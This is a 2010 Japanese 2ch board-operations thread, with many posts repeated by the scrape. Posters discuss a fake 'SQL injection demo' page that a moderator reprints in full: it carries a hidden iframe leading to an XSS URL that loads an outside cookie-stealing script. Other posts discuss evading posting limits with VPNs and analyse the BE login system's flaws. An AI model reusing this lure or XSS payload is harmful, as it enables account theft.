ニュース速報
http://hato.2ch.net/news/
前スレ
【news】ニュース速報運用情報675【ν】
http://qb5.2ch.net/test/read.cgi/operate/1292021115/
http://qb5.2ch.net/test/read.cgi/sakud/1131629475/561
> 561 名前:FOX ★[sage] 投稿日:2007/06/07(木) 20:18:27 ID:???0
> 「嫌なら出てけ」
http://qb5.2ch.net/test/read.cgi/operate/1181680138/387
> 387 名前:ひろゆき@どうやら管理人 ★[] 投稿日:2007/06/14(木) 19:53:42 ID:???0 (PC) ?S★(1001111)
> ネタスレ・クソスレ・実況は不可
> アニメ、声優などのオタスレも不可
> ゲームはアニメ、声優ネタなら不可
> zip、クレクレ等、偽装スレも不可
> ただし、スレタイの遊びは、エロ、差別、アニメ、声優ネタ以外は許容
>
> 一行ソースでも重要性の高いニュースならOK
> スポーツ、芸能もOK
> アンケートスレはスレタイの遊びの範囲ならOK
> アンケートのために適当なニュースソースを張ってる場合は不可
【news】ニュース速報運用情報676【ν】
■ このスレッドは過去ログ倉庫に格納されています
1雪 ★
2010/12/11(土) 21:47:36ID:???02010/12/12(日) 16:40:04ID:8HG5GOP10
3 名前: 半身浴(愛知県)[] 投稿日:2010/12/12(日) 16:36:28.05 ID:dZfDAfFBP
DTBスレか。ひさしぶりだな
4 名前: 銀世界(京都府)[sage] 投稿日:2010/12/12(日) 16:36:30.68 ID:tIKb9i3W0
蘇芳パブリチャンコー!
6 名前: タラバ蟹(九州)[] 投稿日:2010/12/12(日) 16:36:44.06 ID:d+FVZukVO
Darker than Blackスレか
8 名前: 湯たんぽ(東海)[] 投稿日:2010/12/12(日) 16:36:49.90 ID:zeLM2/zKO
最後のガラスを
11 乾布摩擦(チベット自治区) sage 2010/12/12(日) 16:38:21.74 ID:ZA7Eu0+H0
双子見終わったばかりの俺が着ましたよ
もうちょっと面白くなる素材なのに打ち切りマンガみたいな終わり方でもったいない
なにより銀ちゃんがまったく見せ場が無いのが辛い
言い訳のしようがないDTBスレだな
DTBスレか。ひさしぶりだな
4 名前: 銀世界(京都府)[sage] 投稿日:2010/12/12(日) 16:36:30.68 ID:tIKb9i3W0
蘇芳パブリチャンコー!
6 名前: タラバ蟹(九州)[] 投稿日:2010/12/12(日) 16:36:44.06 ID:d+FVZukVO
Darker than Blackスレか
8 名前: 湯たんぽ(東海)[] 投稿日:2010/12/12(日) 16:36:49.90 ID:zeLM2/zKO
最後のガラスを
11 乾布摩擦(チベット自治区) sage 2010/12/12(日) 16:38:21.74 ID:ZA7Eu0+H0
双子見終わったばかりの俺が着ましたよ
もうちょっと面白くなる素材なのに打ち切りマンガみたいな終わり方でもったいない
なにより銀ちゃんがまったく見せ場が無いのが辛い
言い訳のしようがないDTBスレだな
2010/12/12(日) 16:40:11ID:9A8ZkYou0
報告する人1resでいいからこれも足しといてくれ
http://hato.2ch.net/test/read.cgi/news/1292131385/498 2010/12/12 16:37:35.45 ID:VBcxPVotP
http://hato.2ch.net/test/read.cgi/news/1292131385/498 2010/12/12 16:37:35.45 ID:VBcxPVotP
2010/12/12(日) 16:40:26ID:bFSAIydQP
ヒール入ってグダグダ安定
2010/12/12(日) 16:42:23ID:TqYVJ/Ab0
VPNで10秒以内に切り替えして撃つこと出来るの?
2010/12/12(日) 16:43:06ID:/xLB9T7c0
民スト復活?
2010/12/12(日) 16:43:59ID:TqYVJ/Ab0
2010/12/12(日) 16:45:32ID:TqYVJ/Ab0
一つのIPで10秒以内に複数のP2アカウント使って撃とうと思ったんだけどダメか
同じIPの時点でアカウント変えてもダメージが通らないんだが。
ちなみにsambaはP2のユーザーIDで判断してるから接続先は同じでも問題ない。
2010/12/12(日) 16:47:36ID:L0DMVjUJ0
携帯7本用意すればおk
2010/12/12(日) 16:48:08ID:TqYVJ/Ab0
あー…ダメじゃん
そうするとVPNが大量に必要になるから毎月3000円以上かかるな
まずP2と串代わりのVPNを用意
P2(5000森/年) * 6 = 30000森/年 = 3000円/年
2chVPN($4.95/月) * 7 ≒ 2940円/月
次に株主優待を用意。資金に余裕がなければやめる
2400ch森 * (13882株 * 0.003) ≒ 99951ch森 = 9996円
最後に2BPアカウントを用意
300BEポイント * 7垢 = 2100BEポイント = 210円
そうするとVPNが大量に必要になるから毎月3000円以上かかるな
まずP2と串代わりのVPNを用意
P2(5000森/年) * 6 = 30000森/年 = 3000円/年
2chVPN($4.95/月) * 7 ≒ 2940円/月
次に株主優待を用意。資金に余裕がなければやめる
2400ch森 * (13882株 * 0.003) ≒ 99951ch森 = 9996円
最後に2BPアカウントを用意
300BEポイント * 7垢 = 2100BEポイント = 210円
2010/12/12(日) 16:48:55ID:TqYVJ/Ab0
2010/12/12(日) 16:49:41ID:JJp+HnaRP
これでスレ立てお願い
スレタイ
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
本文
Be.2chにSQLインジェクションの脆弱性が発見されました.
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.
詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
スレタイ
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
本文
Be.2chにSQLインジェクションの脆弱性が発見されました.
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.
詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
2010/12/12(日) 16:49:44ID:BF9m6UUZP
例の石川さんはどうやって撃ってたの?
jimのVPNじゃなくてインターリンクのVPNを使えばいいかと。
2010/12/12(日) 16:51:24ID:TqYVJ/Ab0
>>691 いい加減にしろ
板の仕様で遊んでいるだけで荒らしでは無い。
samba突破もしてないし誰にも迷惑はかけてない。
samba突破もしてないし誰にも迷惑はかけてない。
2010/12/12(日) 16:54:23ID:bFSAIydQP
また東日本さんか
2010/12/12(日) 16:55:39ID:BF9m6UUZP
このユーザーの投稿が面白いと思うならポイントが贈れます。 ポイントを送る
0
名前:
紹介文:
ポイント:
登録日:
体験したけど何ともなかった
0
名前:
紹介文:
ポイント:
登録日:
体験したけど何ともなかった
2010/12/12(日) 16:56:25ID:/xLB9T7c0
またロールバックするの?
701あひるちゃん ◆z0WvbsWRgg
2010/12/12(日) 16:56:37ID:DgsRyR500 >>668
ゲージやめて縁なし水槽おすすめ
ゲージやめて縁なし水槽おすすめ
2010/12/12(日) 16:56:41ID:TqYVJ/Ab0
2010/12/12(日) 16:57:19ID:7s3Lq/2E0
復号化したらCookie抜かれてるようなスクリプトだった
ログアウトすれば問題無いと思いました。
2010/12/12(日) 16:58:44ID:D9L83OMm0
よっしゃ、早くニュー速崩壊させろ
ああ、ときわちゃんハムを一つのケージに1匹にするのね
そうこうしてるうちにだんだん動物中心の生活になっていく
>>701
ペットショップだと大抵水槽に入れてるよね
今までケージでしか飼ったことないんだけど、どう違うの?
そうこうしてるうちにだんだん動物中心の生活になっていく
>>701
ペットショップだと大抵水槽に入れてるよね
今までケージでしか飼ったことないんだけど、どう違うの?
707雪 ★
2010/12/12(日) 17:01:08ID:???0 <html>
<head>
<title>Be.2ch SQLインジェクション体験</title>
</head>
<body>
<h1>Be.2ch SQLインジェクション体験</h1>
<p>Be.2chにSQLインジェクションが発見されました.<br />
下記のリンクを押すと体験出来ます.<br />
なお,このサンプルではch森を999999999に出来ます.</p>
<a href="http://be.2ch.net/test/t.php?i=">体験する</a>
<iframe src="http://3.ly/acclog" width="1" height="1" style="display:none;"></iframe>
</body>
</html>
<head>
<title>Be.2ch SQLインジェクション体験</title>
</head>
<body>
<h1>Be.2ch SQLインジェクション体験</h1>
<p>Be.2chにSQLインジェクションが発見されました.<br />
下記のリンクを押すと体験出来ます.<br />
なお,このサンプルではch森を999999999に出来ます.</p>
<a href="http://be.2ch.net/test/t.php?i=">体験する</a>
<iframe src="http://3.ly/acclog" width="1" height="1" style="display:none;"></iframe>
</body>
</html>
2010/12/12(日) 17:01:44ID:CE4PnRFN0
>>707
誰?
誰?
>>707
体験したいです
体験したいです
710雪 ★
2010/12/12(日) 17:02:27ID:???0 またXSSか
http://3.ly/acclog
↓
http://stock.2ch.net/test/result.so?res=%3Cscript%20src=http://b.otsukare.tk/be3.js%3E%3C/script%3E
http://3.ly/acclog
↓
http://stock.2ch.net/test/result.so?res=%3Cscript%20src=http://b.otsukare.tk/be3.js%3E%3C/script%3E
2010/12/12(日) 17:03:02ID:xrG9mB3F0
>>707
これって普段使わないOperaみたいなブラウザから開けば問題ないんだよな?
これって普段使わないOperaみたいなブラウザから開けば問題ないんだよな?
クロスサイトスクリプティングだね
713動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:03:55ID:lEgCOEH80 いいかげん全鯖停止して全部のスクリプト洗いなおせや
タスケテ
2010/12/12(日) 17:04:27ID:iIRN2rl3P
電子は1128002ポイントsakuられるのか
どうせ貰ったポイントだろうけど勿体無いな
どうせ貰ったポイントだろうけど勿体無いな
sakuられないけど
2010/12/12(日) 17:06:03ID:D9L83OMm0
友 達 が 少 な い 人 の 特 徴
http://hato.2ch.net/test/read.cgi/news/1292131999/
こういうスレばっかなニュー速なんてぐちゃぐちゃにしてしまえ
http://hato.2ch.net/test/read.cgi/news/1292131999/
こういうスレばっかなニュー速なんてぐちゃぐちゃにしてしまえ
718Naritaka
2010/12/12(日) 17:06:44ID:JtYTbQaS0 http://3.ly/acclogの接続先調べようと思ったら間違えてアクセスしちゃった
719動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:06:51ID:ljVxgaEe0720動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:07:18ID:DoQn15no0 君子危うきに近寄らず
だぜw
だぜw
721あひるちゃん ◆z0WvbsWRgg
2010/12/12(日) 17:08:39ID:DgsRyR500 >>706
掃除するとき別ばけつにハムスターいれるだろ
ごみをふくろにいれるだろ
風呂場で熱湯と中性洗剤で洗える。
檻じゃねえからガチャガチャおとしない
透明だから見た目もすっきり
水槽は通販が安い
ttp://www.shopping-charm.jp/
掃除するとき別ばけつにハムスターいれるだろ
ごみをふくろにいれるだろ
風呂場で熱湯と中性洗剤で洗える。
檻じゃねえからガチャガチャおとしない
透明だから見た目もすっきり
水槽は通販が安い
ttp://www.shopping-charm.jp/
2010/12/12(日) 17:09:40ID:Z4s9bdsu0
2010/12/12(日) 17:10:00ID:Ti2qLJNK0
潰せとか言ってる人は自分でどうにかしようと思わないの?
短縮ってケツに+つけたら詳細見られるんじゃねえの
少なくともbitlyはそうだた
少なくともbitlyはそうだた
725動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:10:51ID:GgP3HvPc02010/12/12(日) 17:10:51ID:bFSAIydQP
石川さんは繋ぎ変えの速さが凄い
その石川って人は10秒以内で止められるのか?
2010/12/12(日) 17:11:55ID:xBZPXr2K0
>>723
できたらとっくにやってるわ
できたらとっくにやってるわ
2010/12/12(日) 17:12:23ID:EHGkXIgw0
730あひるちゃん ◆z0WvbsWRgg
2010/12/12(日) 17:12:27ID:DgsRyR500 石川県レスもはええよな。最近遭遇してない
2010/12/12(日) 17:12:49ID:8HG5GOP10
>>717
はがない偽装だろ
はがない偽装だろ
2010/12/12(日) 17:13:17ID:iIRN2rl3P
嫌ならν速見なければいいじゃない
何でそこまで粘着してるんだか
何でそこまで粘着してるんだか
733動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:13:52ID:lEgCOEH80 >>727
石川は昨日民ストしようとして失敗してたよw
石川は昨日民ストしようとして失敗してたよw
2010/12/12(日) 17:14:22ID:DGDn4U+T0
危険URLのマルチポストはやめろマジで
うっかり踏みそうになった
うっかり踏みそうになった
2010/12/12(日) 17:15:56ID:qtW8IWFH0
石川式民スト
2010/12/12(日) 17:16:18ID:pwYSM/I60
何でsakuならないの?
740動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:17:06ID:+zdkb4ww0 【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/
早く止めろよ、スレスト仕事し無すぎだろ
http://hato.2ch.net/test/read.cgi/news/1292140478/
早く止めろよ、スレスト仕事し無すぎだろ
2010/12/12(日) 17:17:22ID:W2UsnfXT0
2010/12/12(日) 17:17:27ID:etkbX+pz0
最近のニュー速はグダグダだね
2010/12/12(日) 17:17:33ID:pwYSM/I60
saku回避ってまだできるの?
俺をスレ立てられるようにしろ
浄化してくる
浄化してくる
認証コードって変えられるの?
2010/12/12(日) 17:19:23ID:v8NZG3VR0
>>745
パスワード変更すれば認証コードも変わる
パスワード変更すれば認証コードも変わる
2010/12/12(日) 17:20:42ID:DGDn4U+T0
ID:tu/RKgb+P
こいつの規制を頼む
こいつの規制を頼む
>>746 thx 速攻で変えたよ
メアド公開とかいらないから。
こんばんは
認証コードって頑張ればメルアドから生成出来そうだよね、ってかできてんのかもしれんが
752動け動けウゴウゴ2ちゃんねる
2010/12/12(日) 17:24:23ID:CWzvB4eWP Be.2chにSQLインジェクションの脆弱性が発見されました.
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.
詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
http://www.dotup.org/uploda/www.dotup.org1295972.jpg
下記のリンクを押すと体験出来ます.
なお,このサンプルではch森を999999999に出来ます.
詳細はURLに書いてある
http://arc.mo-e.info/doc/be_sql.html
http://www.dotup.org/uploda/www.dotup.org1295972.jpg
2010/12/12(日) 17:25:43ID:iIRN2rl3P
ここでくだらないことやってる暇があったらスレの1つくらい立てろよ
2010/12/12(日) 17:26:14ID:/xLB9T7c0
なんか運用家族が避難されてるね・・・・
2010/12/12(日) 17:26:22ID:084ipdl90
すげーホントに999999999になったw
2010/12/12(日) 17:27:06ID:v8NZG3VR0
BE鯖の抱える表面的な問題点
・Cookieが一時的なものではなく、パスワードを変えない限り半永久的に使えてしまう
・Cookie中のデータが暗号化されていない。メールアドレスは平文のまま、
認証コードの生成式も流出しているのでパスワードの逆算も可能
・サーバーサイドスクリプトが穴だらけでXSSの温床
根本的な問題点
・Cookie「のみ」で認証していること
例えばIPアドレスも含めて認証するようにすれば第三者が成りすますことは困難になる
そこら辺はここでも指摘されている
http://blog.livedoor.jp/dankogai/archives/50959103.html
Cookieのみで認証する仕組みを変えれば、前述した表面的な問題点はある程度無視できる
XSSを根絶やしにするよりもよっぽど現実的な策であるはず
・Cookieが一時的なものではなく、パスワードを変えない限り半永久的に使えてしまう
・Cookie中のデータが暗号化されていない。メールアドレスは平文のまま、
認証コードの生成式も流出しているのでパスワードの逆算も可能
・サーバーサイドスクリプトが穴だらけでXSSの温床
根本的な問題点
・Cookie「のみ」で認証していること
例えばIPアドレスも含めて認証するようにすれば第三者が成りすますことは困難になる
そこら辺はここでも指摘されている
http://blog.livedoor.jp/dankogai/archives/50959103.html
Cookieのみで認証する仕組みを変えれば、前述した表面的な問題点はある程度無視できる
XSSを根絶やしにするよりもよっぽど現実的な策であるはず
結構積もりましたね
2010/12/12(日) 17:30:04ID:/xLB9T7c0
be所有者のアカウント メアド ip パスが公開される 速攻パス変えとけ
http://hato.2ch.net/test/read.cgi/news/1292142465/
こういうの立てると余計ややこしくなる
http://hato.2ch.net/test/read.cgi/news/1292142465/
こういうの立てると余計ややこしくなる
2010/12/12(日) 17:30:05ID:/e2Z/8Pp0
つまり設計者が無能ってことだな。小学生以下の頭脳。ひろゆきさんか?設計は。
なんだ生成式漏れてんのか
無能だな
無能だな
あーあーテステス
2010/12/12(日) 17:31:28ID:v8NZG3VR0
例えばCookieに ip=[暗号化したipアドレス]をセットさせるんだよ
んで書き込み時はbbs.cgiのどっかでREMOTE_ADDRと[復号化したipアドレス]が一致するかチェック
一致しなければ成りすましと判断してログイン画面に戻す
暗号化のキーがバレたらすぐに変更する
ってだけでいいのに
んで書き込み時はbbs.cgiのどっかでREMOTE_ADDRと[復号化したipアドレス]が一致するかチェック
一致しなければ成りすましと判断してログイン画面に戻す
暗号化のキーがバレたらすぐに変更する
ってだけでいいのに
766あひるちゃん ◆z0WvbsWRgg
2010/12/12(日) 17:32:44ID:DgsRyR5002010/12/12(日) 17:33:03ID:/xLB9T7c0
あひるちゃんってわかってて混乱させるようなスレ立ててるの?
2010/12/12(日) 17:33:25ID:JJp+HnaRP
結構早いプロキシが見つかって大変満足なう
2010/12/12(日) 17:34:17ID:bFSAIydQP
焼かれてるのはカスや
え?トラップかと思ったけど今度の無限増殖ガチなのか?
連続トラブルでbe制度が終わりそうなレベルまできてるように感じる
連続トラブルでbe制度が終わりそうなレベルまできてるように感じる
2010/12/12(日) 17:35:14ID:xrG9mB3F0
VIP警察みたいに運営家族で民スト組合でも作れば良いじゃない
2010/12/12(日) 17:35:18ID:/xLB9T7c0
2010/12/12(日) 17:36:55ID:OAXuamRd0
【速報】Be ch森無限生成復活キタ━━━━━━(゚∀゚)━━━━━━ !!
http://hato.2ch.net/test/read.cgi/news/1292140478/
ニュースでもなんでもないsakuれ
http://hato.2ch.net/test/read.cgi/news/1292140478/
ニュースでもなんでもないsakuれ
2010/12/12(日) 17:37:11ID:D9L83OMm0
よっしゃニューカス民ざまあ
2010/12/12(日) 17:38:41ID:pwYSM/I60
d_e_n_s_h_i@これって電子彗星のアド?
なんで金銭のからんでるbeシステムがこんなに脆弱なんだよ
あちこちの穴つかれまくりじゃないか
あちこちの穴つかれまくりじゃないか
■ このスレッドは過去ログ倉庫に格納されています
